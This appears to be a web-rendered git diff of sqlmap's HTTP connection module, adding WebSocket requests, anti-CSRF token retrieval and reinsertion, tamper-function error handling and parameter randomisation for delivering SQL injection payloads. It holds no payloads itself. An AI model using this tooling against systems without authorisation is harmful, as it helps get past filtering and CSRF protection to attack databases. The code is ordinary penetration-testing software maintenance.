if not urlparse.urlsplit(url).netloc:
|
||||||
url = urlparse.urljoin(conf.url, url)
|
url = urlparse.urljoin(conf.url, url)
|
||||||
|
|
||||||
|
@ -259,10 +278,6 @@ class Connect(object):
|
||||||
# support those by default
|
# support those by default
|
||||||
url = asciifyUrl(url)
|
url = asciifyUrl(url)
|
||||||
|
|
||||||
# fix for known issues when using url in unicode format
|
|
||||||
# (e.g. UnicodeDecodeError: "url = url + '?' + query" in redirect case)
|
|
||||||
url = unicodeencode(url)
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
socket.setdefaulttimeout(timeout)
|
socket.setdefaulttimeout(timeout)
|
||||||
|
|
||||||
|
@ -271,7 +286,6 @@ class Connect(object):
|
||||||
url, params = url.split('?', 1)
|
url, params = url.split('?', 1)
|
||||||
params = urlencode(params)
|
params = urlencode(params)
|
||||||
url = "%s?%s" % (url, params)
|
url = "%s?%s" % (url, params)
|
||||||
requestMsg += "?%s" % params
|
|
||||||
|
|
||||||
elif multipart:
|
elif multipart:
|
||||||
# Needed in this form because of potential circle dependency
|
# Needed in this form because of potential circle dependency
|
||||||
|
@ -302,10 +316,14 @@ class Connect(object):
|
||||||
get = urlencode(get, limit=True)
|
get = urlencode(get, limit=True)
|
||||||
|
|
||||||
if get:
|
if get:
|
||||||
|
if '?' in url:
|
||||||
|
url = "%s%s%s" % (url, DEFAULT_GET_POST_DELIMITER, get)
|
||||||
|
requestMsg += "%s%s" % (DEFAULT_GET_POST_DELIMITER, get)
|
||||||
|
else:
|
||||||
url = "%s?%s" % (url, get)
|
url = "%s?%s" % (url, get)
|
||||||
requestMsg += "?%s" % get
|
requestMsg += "?%s" % get
|
||||||
|
|
||||||
if PLACE.POST in conf.parameters and not post and method in (None, HTTPMETHOD.POST):
|
if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET:
|
||||||
post = conf.parameters[PLACE.POST]
|
post = conf.parameters[PLACE.POST]
|
||||||
|
|
||||||
elif get:
|
elif get:
|
||||||
|
@ -315,7 +333,7 @@ class Connect(object):
|
||||||
requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str
|
requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str
|
||||||
|
|
||||||
# Prepare HTTP headers
|
# Prepare HTTP headers
|
||||||
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer})
|
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host})
|
||||||
|
|
||||||
if kb.authHeader:
|
if kb.authHeader:
|
||||||
headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader
|
headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader
|
||||||
|
@ -323,11 +341,16 @@ class Connect(object):
|
||||||
if kb.proxyAuthHeader:
|
if kb.proxyAuthHeader:
|
||||||
headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader
|
headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader
|
||||||
|
|
||||||
|
if not getHeader(headers, HTTP_HEADER.ACCEPT):
|
||||||
headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
|
headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
|
||||||
headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
|
|
||||||
headers[HTTP_HEADER.HOST] = host or getHostHeader(url)
|
|
||||||
|
|
||||||
if post is not None and HTTP_HEADER.CONTENT_TYPE not in headers:
|
if not getHeader(headers, HTTP_HEADER.HOST) or not target:
|
||||||
|
headers[HTTP_HEADER.HOST] = getHostHeader(url)
|
||||||
|
|
||||||
|
if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING):
|
||||||
|
headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
|
||||||
|
|
||||||
|
if post is not None and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE):
|
||||||
headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)
|
headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)
|
||||||
|
|
||||||
if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]:
|
if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]:
|
||||||
|
@ -350,15 +373,42 @@ class Connect(object):
|
||||||
del headers[key]
|
del headers[key]
|
||||||
headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding)
|
headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding)
|
||||||
|
|
||||||
|
url = unicodeencode(url)
|
||||||
post = unicodeencode(post, kb.pageEncoding)
|
post = unicodeencode(post, kb.pageEncoding)
|
||||||
|
|
||||||
if method:
|
if websocket_:
|
||||||
|
ws = websocket.WebSocket()
|
||||||
|
ws.connect(url, header=("%s: %s" % _ for _ in headers.items() if _[0] not in ("Host",)), cookie=cookie) # WebSocket will add Host field of headers automatically
|
||||||
|
ws.send(urldecode(post or ""))
|
||||||
|
page = ws.recv()
|
||||||
|
ws.close()
|
||||||
|
code = ws.status
|
||||||
|
status = httplib.responses[code]
|
||||||
|
class _(dict):
|
||||||
|
pass
|
||||||
|
responseHeaders = _(ws.getheaders())
|
||||||
|
responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
|
||||||
|
|
||||||
|
requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())
|
||||||
|
requestMsg += "\n%s" % requestHeaders
|
||||||
|
|
||||||
|
if post is not None:
|
||||||
|
requestMsg += "\n\n%s" % getUnicode(post)
|
||||||
|
|
||||||
|
requestMsg += "\n"
|
||||||
|
|
||||||
|
threadData.lastRequestMsg = requestMsg
|
||||||
|
|
||||||
|
logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
|
||||||
|
else:
|
||||||
|
if method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST):
|
||||||
|
method = unicodeencode(method)
|
||||||
req = MethodRequest(url, post, headers)
|
req = MethodRequest(url, post, headers)
|
||||||
req.set_method(method)
|
req.set_method(method)
|
||||||
else:
|
else:
|
||||||
req = urllib2.Request(url, post, headers)
|
req = urllib2.Request(url, post, headers)
|
||||||
|
|
||||||
requestHeaders += "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in req.header_items())
|
requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items())
|
||||||
|
|
||||||
if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
|
if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
|
||||||
conf.cj._policy._now = conf.cj._now = int(time.time())
|
conf.cj._policy._now = conf.cj._now = int(time.time())
|
||||||
|
@ -385,7 +435,7 @@ class Connect(object):
|
||||||
|
|
||||||
conn = urllib2.urlopen(req)
|
conn = urllib2.urlopen(req)
|
||||||
|
|
||||||
if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and conf.authType == AUTH_TYPE.BASIC:
|
if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower():
|
||||||
kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)
|
kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)
|
||||||
|
|
||||||
if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):
|
if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):
|
||||||
|
@ -442,7 +492,7 @@ class Connect(object):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
# Explicit closing of connection object
|
# Explicit closing of connection object
|
||||||
if not conf.keepAlive:
|
if conn and not conf.keepAlive:
|
||||||
try:
|
try:
|
||||||
if hasattr(conn.fp, '_sock'):
|
if hasattr(conn.fp, '_sock'):
|
||||||
conn.fp._sock.close()
|
conn.fp._sock.close()
|
||||||
|
@ -473,8 +523,9 @@ class Connect(object):
|
||||||
page = page if isinstance(page, unicode) else getUnicode(page)
|
page = page if isinstance(page, unicode) else getUnicode(page)
|
||||||
|
|
||||||
code = e.code
|
code = e.code
|
||||||
threadData.lastHTTPError = (threadData.lastRequestUID, code)
|
|
||||||
|
|
||||||
|
kb.originalCode = kb.originalCode or code
|
||||||
|
threadData.lastHTTPError = (threadData.lastRequestUID, code)
|
||||||
kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1
|
kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1
|
||||||
|
|
||||||
status = getUnicode(e.msg)
|
status = getUnicode(e.msg)
|
||||||
|
@ -524,18 +575,22 @@ class Connect(object):
|
||||||
debugMsg = "got HTTP error code: %d (%s)" % (code, status)
|
debugMsg = "got HTTP error code: %d (%s)" % (code, status)
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, ProxyError, SqlmapCompressionException), e:
|
except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, ProxyError, SqlmapCompressionException, WebSocketException), e:
|
||||||
tbMsg = traceback.format_exc()
|
tbMsg = traceback.format_exc()
|
||||||
|
|
||||||
if "no host given" in tbMsg:
|
if "no host given" in tbMsg:
|
||||||
warnMsg = "invalid URL address used (%s)" % repr(url)
|
warnMsg = "invalid URL address used (%s)" % repr(url)
|
||||||
raise SqlmapSyntaxException(warnMsg)
|
raise SqlmapSyntaxException(warnMsg)
|
||||||
elif "forcibly closed" in tbMsg:
|
elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
|
||||||
warnMsg = "connection was forcibly closed by the target URL"
|
warnMsg = "connection was forcibly closed by the target URL"
|
||||||
elif "timed out" in tbMsg:
|
elif "timed out" in tbMsg:
|
||||||
|
if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
|
||||||
|
singleTimeWarnMessage("there is a possibility that the target (or WAF) is dropping 'suspicious' requests")
|
||||||
warnMsg = "connection timed out to the target URL"
|
warnMsg = "connection timed out to the target URL"
|
||||||
elif "URLError" in tbMsg or "error" in tbMsg:
|
elif "URLError" in tbMsg or "error" in tbMsg:
|
||||||
warnMsg = "unable to connect to the target URL"
|
warnMsg = "unable to connect to the target URL"
|
||||||
|
elif "NTLM" in tbMsg:
|
||||||
|
warnMsg = "there has been a problem with NTLM authentication"
|
||||||
elif "BadStatusLine" in tbMsg:
|
elif "BadStatusLine" in tbMsg:
|
||||||
warnMsg = "connection dropped or unknown HTTP "
|
warnMsg = "connection dropped or unknown HTTP "
|
||||||
warnMsg += "status code received"
|
warnMsg += "status code received"
|
||||||
|
@ -545,6 +600,10 @@ class Connect(object):
|
||||||
elif "IncompleteRead" in tbMsg:
|
elif "IncompleteRead" in tbMsg:
|
||||||
warnMsg = "there was an incomplete read error while retrieving data "
|
warnMsg = "there was an incomplete read error while retrieving data "
|
||||||
warnMsg += "from the target URL"
|
warnMsg += "from the target URL"
|
||||||
|
elif "Handshake status" in tbMsg:
|
||||||
|
status = re.search("Handshake status ([\d]{3})", tbMsg)
|
||||||
|
errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown"
|
||||||
|
raise SqlmapConnectionException(errMsg)
|
||||||
else:
|
else:
|
||||||
warnMsg = "unable to connect to the target URL"
|
warnMsg = "unable to connect to the target URL"
|
||||||
|
|
||||||
|
@ -581,7 +640,13 @@ class Connect(object):
|
||||||
if conn and getattr(conn, "redurl", None):
|
if conn and getattr(conn, "redurl", None):
|
||||||
_ = urlparse.urlsplit(conn.redurl)
|
_ = urlparse.urlsplit(conn.redurl)
|
||||||
_ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else ""))
|
_ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else ""))
|
||||||
requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_), requestMsg, 1)
|
requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % re.escape(getUnicode(_)), requestMsg, 1)
|
||||||
|
|
||||||
|
if kb.resendPostOnRedirect is False:
|
||||||
|
requestMsg = re.sub("(\[#\d+\]:\n)POST ", "\g<1>GET ", requestMsg)
|
||||||
|
requestMsg = re.sub("(?i)Content-length: \d+\n", "", requestMsg)
|
||||||
|
requestMsg = re.sub("(?s)\n\n.+", "\n", requestMsg)
|
||||||
|
|
||||||
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, conn.code, status)
|
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, conn.code, status)
|
||||||
else:
|
else:
|
||||||
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
|
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
|
||||||
|
@ -630,13 +695,14 @@ class Connect(object):
|
||||||
auxHeaders = {}
|
auxHeaders = {}
|
||||||
|
|
||||||
raise404 = place != PLACE.URI if raise404 is None else raise404
|
raise404 = place != PLACE.URI if raise404 is None else raise404
|
||||||
|
method = method or conf.method
|
||||||
|
|
||||||
value = agent.adjustLateValues(value)
|
value = agent.adjustLateValues(value)
|
||||||
payload = agent.extractPayload(value)
|
payload = agent.extractPayload(value)
|
||||||
threadData = getCurrentThreadData()
|
threadData = getCurrentThreadData()
|
||||||
|
|
||||||
if conf.httpHeaders:
|
if conf.httpHeaders:
|
||||||
headers = dict(conf.httpHeaders)
|
headers = OrderedDict(conf.httpHeaders)
|
||||||
contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())
|
contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())
|
||||||
|
|
||||||
if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode:
|
if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode:
|
||||||
|
@ -648,7 +714,13 @@ class Connect(object):
|
||||||
if payload:
|
if payload:
|
||||||
if kb.tamperFunctions:
|
if kb.tamperFunctions:
|
||||||
for function in kb.tamperFunctions:
|
for function in kb.tamperFunctions:
|
||||||
|
try:
|
||||||
payload = function(payload=payload, headers=auxHeaders)
|
payload = function(payload=payload, headers=auxHeaders)
|
||||||
|
except Exception, ex:
|
||||||
|
errMsg = "error occurred while running tamper "
|
||||||
|
errMsg += "function '%s' ('%s')" % (function.func_name, ex)
|
||||||
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
if not isinstance(payload, basestring):
|
if not isinstance(payload, basestring):
|
||||||
errMsg = "tamper function '%s' returns " % function.func_name
|
errMsg = "tamper function '%s' returns " % function.func_name
|
||||||
errMsg += "invalid payload type ('%s')" % type(payload)
|
errMsg += "invalid payload type ('%s')" % type(payload)
|
||||||
|
@ -677,7 +749,7 @@ class Connect(object):
|
||||||
payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
|
payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
|
||||||
value = agent.replacePayload(value, payload)
|
value = agent.replacePayload(value, payload)
|
||||||
else:
|
else:
|
||||||
# GET, POST, URI and Cookie payload needs to be throughly URL encoded
|
# GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
|
||||||
if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode:
|
if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode:
|
||||||
payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below
|
payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below
|
||||||
value = agent.replacePayload(value, payload)
|
value = agent.replacePayload(value, payload)
|
||||||
|
@ -745,54 +817,137 @@ class Connect(object):
|
||||||
if value and place == PLACE.CUSTOM_HEADER:
|
if value and place == PLACE.CUSTOM_HEADER:
|
||||||
auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]
|
auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]
|
||||||
|
|
||||||
|
if conf.csrfToken:
|
||||||
|
def _adjustParameter(paramString, parameter, newValue):
|
||||||
|
retVal = paramString
|
||||||
|
match = re.search("%s=(?P<value>[^&]*)" % re.escape(parameter), paramString)
|
||||||
|
if match:
|
||||||
|
retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString)
|
||||||
|
return retVal
|
||||||
|
|
||||||
|
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
|
||||||
|
match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "")
|
||||||
|
token = (match.group(2) or match.group(3) or match.group(4)) if match else None
|
||||||
|
|
||||||
|
if not token:
|
||||||
|
if conf.csrfUrl != conf.url and code == httplib.OK:
|
||||||
|
if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
|
||||||
|
token = page
|
||||||
|
|
||||||
|
if not token and any(_.name == conf.csrfToken for _ in conf.cj):
|
||||||
|
for _ in conf.cj:
|
||||||
|
if _.name == conf.csrfToken:
|
||||||
|
token = _.value
|
||||||
|
if not any (conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):
|
||||||
|
if post:
|
||||||
|
post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
|
||||||
|
elif get:
|
||||||
|
get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
|
||||||
|
else:
|
||||||
|
get = "%s=%s" % (conf.csrfToken, token)
|
||||||
|
break
|
||||||
|
|
||||||
|
if not token:
|
||||||
|
errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
|
||||||
|
if not conf.csrfUrl:
|
||||||
|
errMsg += ". You can try to rerun by providing "
|
||||||
|
errMsg += "a valid value for option '--csrf-url'"
|
||||||
|
raise SqlmapTokenException, errMsg
|
||||||
|
|
||||||
|
if token:
|
||||||
|
for place in (PLACE.GET, PLACE.POST):
|
||||||
|
if place in conf.parameters:
|
||||||
|
if place == PLACE.GET and get:
|
||||||
|
get = _adjustParameter(get, conf.csrfToken, token)
|
||||||
|
elif place == PLACE.POST and post:
|
||||||
|
post = _adjustParameter(post, conf.csrfToken, token)
|
||||||
|
|
||||||
|
for i in xrange(len(conf.httpHeaders)):
|
||||||
|
if conf.httpHeaders[i][0].lower() == conf.csrfToken.lower():
|
||||||
|
conf.httpHeaders[i] = (conf.httpHeaders[i][0], token)
|
||||||
|
|
||||||
if conf.rParam:
|
if conf.rParam:
|
||||||
def _randomizeParameter(paramString, randomParameter):
|
def _randomizeParameter(paramString, randomParameter):
|
||||||
retVal = paramString
|
retVal = paramString
|
||||||
match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString)
|
match = re.search(r"(\A|\b)%s=(?P<value>[^&;]+)" % re.escape(randomParameter), paramString)
|
||||||
if match:
|
if match:
|
||||||
origValue = match.group("value")
|
origValue = match.group("value")
|
||||||
retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
|
retVal = re.sub(r"(\A|\b)%s=[^&;]+" % re.escape(randomParameter), "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
for randomParameter in conf.rParam:
|
for randomParameter in conf.rParam:
|
||||||
for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
|
for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE, PLACE.URI, PLACE.CUSTOM_POST):
|
||||||
if item in conf.parameters:
|
if item in conf.parameters:
|
||||||
if item == PLACE.GET and get:
|
if item == PLACE.GET and get:
|
||||||
get = _randomizeParameter(get, randomParameter)
|
get = _randomizeParameter(get, randomParameter)
|
||||||
elif item == PLACE.POST and post:
|
elif item in (PLACE.POST, PLACE.CUSTOM_POST) and post:
|
||||||
post = _randomizeParameter(post, randomParameter)
|
post = _randomizeParameter(post, randomParameter)
|
||||||
elif item == PLACE.COOKIE and cookie:
|
elif item == PLACE.COOKIE and cookie:
|
||||||
cookie = _randomizeParameter(cookie, randomParameter)
|
cookie = _randomizeParameter(cookie, randomParameter)
|
||||||
|
elif item == PLACE.URI and uri:
|
||||||
|
uri = _randomizeParameter(uri, randomParameter)
|
||||||
|
|
||||||
if conf.evalCode:
|
if conf.evalCode:
|
||||||
delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER
|
delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER
|
||||||
variables = {}
|
variables = {"uri": uri}
|
||||||
originals = {}
|
originals = {}
|
||||||
|
keywords = keyword.kwlist
|
||||||
|
|
||||||
for item in filter(None, (get, post if not kb.postHint else None)):
|
for item in filter(None, (get, post if not kb.postHint else None)):
|
||||||
for part in item.split(delimiter):
|
for part in item.split(delimiter):
|
||||||
if '=' in part:
|
if '=' in part:
|
||||||
name, value = part.split('=', 1)
|
name, value = part.split('=', 1)
|
||||||
|
name = re.sub(r"[^\w]", "", name.strip())
|
||||||
|
if name in keywords:
|
||||||
|
name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
|
||||||
value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus))
|
value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus))
|
||||||
evaluateCode("%s=%s" % (name.strip(), repr(value)), variables)
|
variables[name] = value
|
||||||
|
|
||||||
if cookie:
|
if cookie:
|
||||||
for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER):
|
for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER):
|
||||||
if '=' in part:
|
if '=' in part:
|
||||||
name, value = part.split('=', 1)
|
name, value = part.split('=', 1)
|
||||||
|
name = re.sub(r"[^\w]", "", name.strip())
|
||||||
|
if name in keywords:
|
||||||
|
name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
|
||||||
value = urldecode(value, convall=True)
|
value = urldecode(value, convall=True)
|
||||||
evaluateCode("%s=%s" % (name.strip(), repr(value)), variables)
|
variables[name] = value
|
||||||
|
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
compiler.parse(conf.evalCode.replace(';', '\n'))
|
||||||
|
except SyntaxError, ex:
|
||||||
|
original = replacement = ex.text.strip()
|
||||||
|
for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
|
||||||
|
if _ in keywords:
|
||||||
|
replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
|
||||||
|
break
|
||||||
|
if original == replacement:
|
||||||
|
conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
conf.evalCode = conf.evalCode.replace(ex.text.strip(), replacement)
|
||||||
|
else:
|
||||||
|
break
|
||||||
|
|
||||||
originals.update(variables)
|
originals.update(variables)
|
||||||
evaluateCode(conf.evalCode, variables)
|
evaluateCode(conf.evalCode, variables)
|
||||||
|
|
||||||
|
for variable in variables.keys():
|
||||||
|
if variable.endswith(EVALCODE_KEYWORD_SUFFIX):
|
||||||
|
value = variables[variable]
|
||||||
|
del variables[variable]
|
||||||
|
variables[variable.replace(EVALCODE_KEYWORD_SUFFIX, "")] = value
|
||||||
|
|
||||||
|
uri = variables["uri"]
|
||||||
|
|
||||||
for name, value in variables.items():
|
for name, value in variables.items():
|
||||||
if name != "__builtins__" and originals.get(name, "") != value:
|
if name != "__builtins__" and originals.get(name, "") != value:
|
||||||
if isinstance(value, (basestring, int)):
|
if isinstance(value, (basestring, int)):
|
||||||
found = False
|
found = False
|
||||||
value = unicode(value)
|
value = unicode(value)
|
||||||
|
|
||||||
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), name, re.escape(delimiter))
|
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
|
||||||
if re.search(regex, (get or "")):
|
if re.search(regex, (get or "")):
|
||||||
found = True
|
found = True
|
||||||
get = re.sub(regex, "\g<1>%s\g<3>" % value, get)
|
get = re.sub(regex, "\g<1>%s\g<3>" % value, get)
|
||||||
|
@ -856,23 +1011,26 @@ class Connect(object):
|
||||||
if deviation > WARN_TIME_STDEV:
|
if deviation > WARN_TIME_STDEV:
|
||||||
kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE
|
kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE
|
||||||
|
|
||||||
warnMsg = "there is considerable lagging "
|
warnMsg = "considerable lagging has been detected "
|
||||||
warnMsg += "in connection response(s). Please use as high "
|
warnMsg += "in connection response(s). Please use as high "
|
||||||
warnMsg += "value for option '--time-sec' as possible (e.g. "
|
warnMsg += "value for option '--time-sec' as possible (e.g. "
|
||||||
warnMsg += "10 or more)"
|
warnMsg += "10 or more)"
|
||||||
logger.critical(warnMsg)
|
logger.critical(warnMsg)
|
||||||
|
|
||||||
|
if conf.safeFreq > 0:
|
||||||
if conf.safUrl and conf.saFreq > 0:
|
|
||||||
kb.queryCounter += 1
|
kb.queryCounter += 1
|
||||||
if kb.queryCounter % conf.saFreq == 0:
|
if kb.queryCounter % conf.safeFreq == 0:
|
||||||
Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)
|
if conf.safeUrl:
|
||||||
|
Connect.getPage(url=conf.safeUrl, post=conf.safePost, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)
|
||||||
|
elif kb.safeReq:
|
||||||
|
Connect.getPage(url=kb.safeReq.url, post=kb.safeReq.post, method=kb.safeReq.method, auxHeaders=kb.safeReq.headers)
|
||||||
|
|
||||||
start = time.time()
|
start = time.time()
|
||||||
|
|
||||||
if kb.nullConnection and not content and not response and not timeBasedCompare:
|
if kb.nullConnection and not content and not response and not timeBasedCompare:
|
||||||
noteResponseTime = False
|
noteResponseTime = False
|
||||||
|
|
||||||
|
try:
|
||||||
pushValue(kb.pageCompress)
|
pushValue(kb.pageCompress)
|
||||||
kb.pageCompress = False
|
kb.pageCompress = False
|
||||||
|
|
||||||
|
@ -881,19 +1039,19 @@ class Connect(object):
|
||||||
elif kb.nullConnection == NULLCONNECTION.RANGE:
|
elif kb.nullConnection == NULLCONNECTION.RANGE:
|
||||||
auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1"
|
auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1"
|
||||||
|
|
||||||
_, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
|
_, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
|
||||||
|
|
||||||
if headers:
|
if headers:
|
||||||
if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:
|
if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:
|
||||||
pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH])
|
pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH])
|
||||||
elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers:
|
elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers:
|
||||||
pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:])
|
pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:])
|
||||||
|
finally:
|
||||||
